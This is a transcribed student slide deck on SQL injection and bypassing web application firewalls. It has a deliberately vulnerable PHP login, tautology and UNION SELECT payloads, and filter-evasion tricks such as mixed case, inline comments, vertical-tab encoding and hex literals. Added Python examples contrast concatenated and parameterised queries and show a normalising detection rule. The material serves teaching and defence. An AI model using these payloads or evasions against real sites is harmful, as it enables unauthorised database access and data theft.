![Page 1: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/1.jpg)
All Ab0ut 0f SQL Injection and WAF Bypass Techniques
THATSANAI DETDAMRONGPREEECHA
COMPUTER SCIENCE @ KING MONGKUT'S INSTITUTE OF TECHNOLOGY LADKRABANG
What is SQL Injection?
SQL injection is a form of code injection.
It happens when user input is placed into an SQL command without being filtered, so the user can change the query's condition.
The root cause is that the developer does not filter (or parameterise) input coming from the user.
Logical conjunction (AND) and disjunction (OR) truth table
SQL Operators
AND, &&        (logical conjunction)
OR, ||         (logical disjunction)
LIKE           (pattern match)
*              (all columns in SELECT)
( , )          (grouping)
< , >          (comparison)
+, -, *, /, %  (arithmetic)
SQL Comments
End of the line:
"#"
"--"
"-- "   (MySQL requires at least one whitespace character after "--")
Multiple lines:
/* */
Examples
Vulnerable queries and injected input
SQL command:
SELECT first_name, last_name FROM users WHERE user_id = '$id'
Injected input and the resulting query:
SELECT first_name, last_name FROM users WHERE user_id = '1' or '1'
SELECT first_name, last_name FROM users WHERE user_id = 'am' or 'am'
SELECT first_name, last_name FROM users WHERE user_id = '' or '1'='1'
SELECT first_name, last_name FROM users WHERE user_id = '' or '2600'='2600'
SELECT first_name, last_name FROM users WHERE user_id = '' or 'HELLO' or 'HELLO'
SELECT first_name, last_name FROM users WHERE user_id = '' or 1 #'
SELECT first_name, last_name FROM users WHERE user_id = '' or true #'
SQL command:
SELECT first_name, last_name FROM users WHERE user_id = $id
Injected input:
true
'1' or '1'
2 or 2
SQL command:
SELECT first_name, last_name FROM users WHERE user_id = ($id)
Injected input:
1) or (1
2+3) or (5
http://cs.ssru.ac.th/cs01/mae/Pae/ตั�วอย่�างและโปรแกรมที่��โหลดๆมา/Login_thaicreate/PHP MySQL ก�บLogin Form ที่�าระบบ User ล�อกอ�น แบบง�าย่ ๆ ด�วย่ PHP และ MySQL โดย่ที่�าการตัรวจสอบ Username และPassword.htm
http://www.santosh143.com/2013/05/how-to-create-loginregister-system.html
http://www.exploit-db.com/exploits/26405/
http://www.exploit-db.com/exploits/26416/
Example
Vulnerable login code (login_sqli1.php); the username is concatenated straight into the query:

```php
<?php
// $db is assumed to be an open connection from mysql_connect() (not shown on the slide).
// Only the password is hashed; the username is placed into the SQL text unescaped,
// so a quote in $_GET['username'] ends the string literal and the rest is parsed as SQL.
$sql = "SELECT * FROM members WHERE password='" . md5($_GET['password']) . "' AND username='" . $_GET['username'] . "'";
$result = mysql_query($sql, $db);
if ($result === FALSE)
    die('Invalid SQL query');
if (mysql_num_rows($result) == 1) {
    echo "Congrats, WIN!!!\n";   // exactly one matching row is treated as a successful login
}
else {
    echo "The number of rows is not 1\n";
}
```

Injected request:
login_sqli1.php?password=whatever&username='+or+1=1+LIMIT+1#
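As an added example (not code from the slides), the same login check written twice in Python against an in-memory SQLite database: `login_vulnerable` builds the SQL string the way login_sqli1.php does, and `login_safe` binds the hash and username as parameters, which is what the "Secure database queries" tip at the end of the deck amounts to. The `members` rows are constructed. SQLite has no `#` comment, so the slide's `' or 1=1 LIMIT 1#` input is written with `--` here; the earlier `' or '1'='1` input is included as well, because it matches every row and therefore fails the code's "exactly one row" check, which is what the `LIMIT 1` in the slide's payload works around.

```python
import hashlib
import sqlite3

# Constructed sample rows standing in for the slide's MySQL 'members' table;
# passwords are stored as md5 hashes, exactly as login_sqli1.php expects.
MEMBERS = [
    ("admin", "admin-secret"),
    ("alice", "alice-pass"),
    ("bob", "bob-pass"),
]


def make_db() -> sqlite3.Connection:
    """Fresh in-memory SQLite database holding the three constructed members."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO members VALUES (?, ?)",
        [(user, hashlib.md5(pw.encode()).hexdigest()) for user, pw in MEMBERS],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> int:
    """Mirrors login_sqli1.php: the username is pasted into the SQL text.

    Returns the number of rows the query matched; the PHP code treats
    exactly one row as a successful login.
    """
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = ("SELECT * FROM members WHERE password='" + pw_hash
           + "' AND username='" + username + "'")
    return len(conn.execute(sql).fetchall())


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> int:
    """Same query with bound parameters: the driver sends the username as data,
    so a quote or comment marker inside it can never change the WHERE clause."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = "SELECT * FROM members WHERE password=? AND username=?"
    return len(conn.execute(sql, (pw_hash, username)).fetchall())


# The slide's input ends with MySQL's '#' comment; SQLite only knows '--',
# so the same idea is spelled with '--' here.
PAYLOAD_LIMIT = "' or 1=1 LIMIT 1 --"
PAYLOAD_TAUTOLOGY = "' or '1'='1"


def demo() -> dict:
    """Row counts for each (function, input) pair, for side-by-side comparison."""
    return {
        "vuln/tautology": login_vulnerable(make_db(), PAYLOAD_TAUTOLOGY, "whatever"),
        "vuln/limit":     login_vulnerable(make_db(), PAYLOAD_LIMIT, "whatever"),
        "safe/limit":     login_safe(make_db(), PAYLOAD_LIMIT, "whatever"),
        "safe/real":      login_safe(make_db(), "alice", "alice-pass"),
        "vuln/real":      login_vulnerable(make_db(), "alice", "alice-pass"),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:15s} -> {rows} row(s)")
```

With the concatenated query the tautology input matches all three members (so the `== 1` check fails) and the `LIMIT 1` input matches exactly one, which is a "win"; with bound parameters the same input matches nothing while a real credential still returns its one row.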
Impact
Read information from the database
Can lead to gaining access to the system
Etc.
Bypass Web Application Firewall Techniques
What is a Web Application Firewall?
A Web Application Firewall (WAF)
Software or hardware
Focuses on protecting the website
Filters all data at the application layer
Can detect and block attacks against the website
How to Bypass?
Original:
1' or '1'='1
union all select 1,2,3,4,5 --
union all select 1,2,@@version,4,5 --
Solution (mixed case and inline comments, which a rule matching the plain keyword does not see):
1' oR '1'='1
uNIon AlL sELeCt 1,2,3,4,5 --
u/*2600*/ni/*12345*/on a/*..*/lL se/*AAAA*/lEct 1,2,@@VerSIon,4,5 --
How to Bypass? (cont.)
If the filter blocks or / and:
Solution: use || instead of or
Use && instead of and
How to Bypass? (cont.)
If the filter blocks where:
Solution: use limit instead of where
If the filter blocks limit:
Solution: you can use group by and having instead of where
How to Bypass? (cont.)
If the filter blocks whitespace:
Solution: use %0b (URL-encoded vertical tab) instead of a space
If the filter blocks ':
Solution: use hex literals (0xXX) or unhex(xx) instead of quoted strings
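Added example, not part of the deck: a small Python check that runs two keyword signatures over a request parameter both on the raw value and after normalisation (URL-decoding, stripping `/* */` comments, folding `||` and `&&` to `or` and `and`, collapsing whitespace, lowercasing). The sample parameters are constructed from the payloads on the preceding slides plus one benign value; the rules and the steps in `normalize` are this example's own and do not describe any particular WAF product.

```python
import re
from urllib.parse import unquote

# Two signatures of the kind a simple keyword-matching rule uses. Both are
# written in lowercase with ordinary whitespace, which is exactly what the
# evasions on the slides exploit when the rule is applied to raw bytes.
RULES = [
    re.compile(r"\bunion\s+(?:all\s+)?select\b"),   # UNION ... SELECT
    re.compile(r"\bor\s+'?(\w+)'?\s*=\s*'?\1\b"),    # or '1'='1 style tautology
]


def normalize(param: str) -> str:
    """Canonicalise a request parameter before matching signatures."""
    s = unquote(param)                            # %0b, %20 ... -> the characters they encode
    s = re.sub(r"/\*.*?\*/", "", s, flags=re.S)   # u/*2600*/ni/*12345*/on -> union
    s = s.replace("||", " or ").replace("&&", " and ")
    s = re.sub(r"\s+", " ", s)                    # tab, vertical tab, newline -> one space
    return s.lower().strip()


def naive_hit(param: str) -> bool:
    """Match the raw parameter, as a rule without normalisation would."""
    return any(rule.search(param) for rule in RULES)


def normalized_hit(param: str) -> bool:
    """Match after canonicalisation."""
    return any(rule.search(normalize(param)) for rule in RULES)


# Constructed request parameters: the deck's payloads plus one benign value.
SAMPLES = {
    "plain":      "1' union all select 1,2,3,4,5 --",
    "mixed case": "1' uNIon AlL sELeCt 1,2,3,4,5 --",
    "comments":   "1' u/*2600*/ni/*12345*/on a/*..*/lL se/*AAAA*/lEct 1,2,@@VerSIon,4,5 --",
    "vtab":       "1'%0bunion%0ball%0bselect%0b1,2,3,4,5",
    "pipes":      "' || '1'='1",
    "benign":     "search term about unions",
}


def report() -> dict:
    """(raw hit, normalised hit) for every sample."""
    return {name: (naive_hit(p), normalized_hit(p)) for name, p in SAMPLES.items()}


if __name__ == "__main__":
    for name, (raw, canon) in report().items():
        print(f"{name:11s} raw={str(raw):5s} normalized={canon}")
```

Every variant on these slides gets past the rules when they look at raw bytes, and the same two rules catch all of them once the parameter is canonicalised. Since any normaliser can be out-stepped by an encoding it does not fold, this kind of filtering is a second layer behind parameterised queries, not a replacement for them.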
How to Mitigate
Top 5 Secure Coding Tips for PHP applications
1. Filter input data: GET, POST, COOKIE
2. Secure database queries
3. Filter output data: htmlspecialchars(), htmlentities(), strip_tags(), strtr()
4. Error handling: log_errors = On, display_errors = Off
5. Prevent other injection attacks
References and Appendix
www.owasp.org
http://palpapers.plynt.com/issues/2009Dec/secure-coding-php/
http://dev.mysql.com/doc/refman/5.0/en/non-typed-operators.html
http://thtutz.blogspot.com